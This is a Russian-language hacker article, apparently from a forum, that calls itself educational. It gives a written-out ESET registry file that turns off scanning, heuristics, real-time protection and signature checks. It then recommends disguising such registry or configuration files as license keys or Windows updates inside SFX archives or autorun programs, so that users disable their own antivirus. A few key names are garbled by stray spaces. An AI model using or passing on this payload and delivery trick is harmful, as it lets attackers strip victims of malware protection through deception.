///////////////////////////////////////////////////////////////////////////////////
Данная статья написана ИСКЛЮЧИТЕЛЬНО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ И С ЦЕЛЬЮ ПОКАЗАТЬ ПРОИЗВОДИТЕЛЯМ АНТИВИРУСОВ ИХ ОГРЕХИ!Автор етой статьи НЕ НЕСЕТ НИКАКОЙ ответственности за использование материалов и самой статьи,которую вы читаете!Вы делаете на СВОЙ СТРАХ И РИСК!!!
///////////////////////////////////////////////////////////////////////////////////
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# # ### #### ##### #####
## # # # # # # ##
# # # # # # # ##### ##
# # # # # # # # ##
# ## # # # # # ##
# # ### #### ###### ######
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
======================================================
Ключики-отмычки!:) |
======================================================
Всем хакерам привет!В етой статье я опишу некоторые уязвимости и недоработки популярных антивирусов,которых любят расхваливать антивирусные конторы!Делаю ето с целью указать разработчикам на их огрехи и промахи!(Ну и в целях образования,ессесно!:):))
Итак,в чем же собсно суть прикола?А в том,что антивирусы блокируют и удаляют вредоносные и похожые на них опасные сигнатуры!В любом нормальном антивирусе есть лицензионные ключи,которые продляют работоспособность антивируса!Ведь если бы антивирусы сканировали ключи,то они бы не смогли их добавить!И вот наш антивирус крутой,навороченный,проактивка все находит по активности приложения... НО-ни один из сканеров антивируса не скажет,что ключ реестра может нести в себе опасность!В многих антивирусах есть самозащита,которая не позволяет манипулировать антивирусом как удаленно,так и напрямую!Есть также и функцыя защиты данных паролем!Но все они легко изменяються ключем того же реестра или файлом конфигураций,которые он не определит как вирус!Вот например,вам нужно вырубить антивирь(функцыи скана),или чтобы он чуть преобразился!Вот тогда делаем так:Открываем консоль,прописываем команду regedit,и ищем ключи типа [HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@In-depth scan] А потом изменяем их значения на свои!Например-
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@In-depth scan]
"AdvancedHeuristicsEnable"=dword:00000000
"AdwareEnable"=dword:00000000
"ArchiveEnable"=dword:00000000
"CleanLevel"=dword:00000000
"Fi leEnable"=dword:00000000
"HeuristicsEnable"=dword:00000000
"MailEnable"=dword:00000000
"MemoryEnable"=dword:00000000
"RtpEnable"=dword:0 0000000
"SectorEnable"=dword:00000000
"SfxEnable"=dword:00000000
"SignaturesEnable"=dword:00000000
"UnwantedEnable"=dword:00000000
"Log AllEnable"=dword:00000000 [HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@In-depth scan\Statistic]
"ScanTime"=hex:50,5b,22,a9,4b,b3,c9,01
"DatabaseVersion"="3982 (20090402)"
"DatabaseVersionID"=dword:00000f8e
"ObjectCount"=dword:00000000
"InfectedObjectCount"=dword:00000000
"CleanedObjectCount"=dw ord:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@My profile]
"UnwantedEnable"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@My profile\Statistic]
"ScanTime"=hex:50,36,a8,6e,79,b4,c9,01
"DatabaseVersion"="3985 (20090403)"
"DatabaseVersionID"=dword:00000f91
"ObjectCount"=dword:00000185
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@Shellext scan]
"AdvancedHeuristicsEnable"=dword:00000000
"AdwareEnable"=dword:00000000
"ArchiveEnable"=dword:00000000
"CleanLevel"=dword:00000000
"Fi leEnable"=dword:00000000
"HeuristicsEnable"=dword:00000000
"MailEnable"=dword:00000000
"MemoryEnable"=dword:00000000
"RtpEnable"=dword:0 0000000
"SectorEnable"=dword:00000000
"SfxEnable"=dword:00000000
"SignaturesEnable"=dword:00000000
"UnwantedEnable"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Scanners\01010100\Profiles\@Smart scan]
"AdvancedHeuristicsEnable"=dword:00000000
"AdwareEnable"=dword:00000000
"ArchiveEnable"=dword:00000000
"CleanLevel"=dword:00000000
"Fi leEnable"=dword:00000000
"HeuristicsEnable"=dword:00000000
"MailEnable"=dword:00000000
"MemoryEnable"=dword:00000000
"RtpEnable"=dword:0 0000000
"SectorEnable"=dword:00000000
"SfxEnable"=dword:00000000
"SignaturesEnable"=dword:00000000
"UnwantedEnable"=dword:00000000
И потом сохраняем ети изменения в ключе,который потом експортируем!
Вот таким образом можна снять защиту антивиря!
Есть также намеки,что антивирь запрещает изменения в реестре....
Да,но не все,потому что при установке нового ключа,пользователь(особенно тот,кому нужен свежый ключ под антивирь!:)) без раздумья добавит его,или выключит антивирус,чтоб добавить(и такие КАДРЫ есть!)!
Такие вот ключи можно сделать под любой антивирус,которому нужны ключи лицезии!,и етот прикол надеюсь,сработает у всех!
==============================================================================================
ФАЙЛЫ Конфигурацый или свой-чужой!|
==================================
Все конфиги-зло!Не верьте что они хорошые!В чем же их вина-их вина в АВТОМАТИЗМЕ НАСТРОЕК!
Вот мы устанавливаем любой антивирус,и чаще всего опытные пользователи не леняться и настраивают антивирус ручками,проверяя каждую загогулину на предмет вшывости!
Но есть категория людей,которых кличут лентяи и ламеры!Так вот некоторые из них очень не любят копаться в настройках!Более того,даже некоторые опытные люди говорят-"Зачем мол столько времени тратить?Импортировал файл и готово!","Да нафига настраивать?Он без настроек лучше детектит всю хакерскую фигню....." и т.д и т.п,!
Так вот,оно то так,файлы конфигурацый выгоднее,НО...ЕСЛИ ОНИ НЕ ЧУЖЫЕ!!!
Антивирусы проверяют все файлы,если их настроить,но они не могут обнаружить опасность в файле конфигураций или ключе реестра из-за своей тупости!И если кто-нибудь закинет кому-нибудь такой файлик или ключик в SFX-архив или прогу-авторан и назовут их типа "Windows Update Key","License Key Antivirus...",то 60-80% пользователей разрешат добавление и сами отключат свою защиту!
Таким макаром снимаеться защита любого антивируса,если все правильно настроено!
*****************************************
С вами был Dark Koder aka %$TrOyAn$%!!! *
До новых встреч и полезных мануалов!... *
*****************************************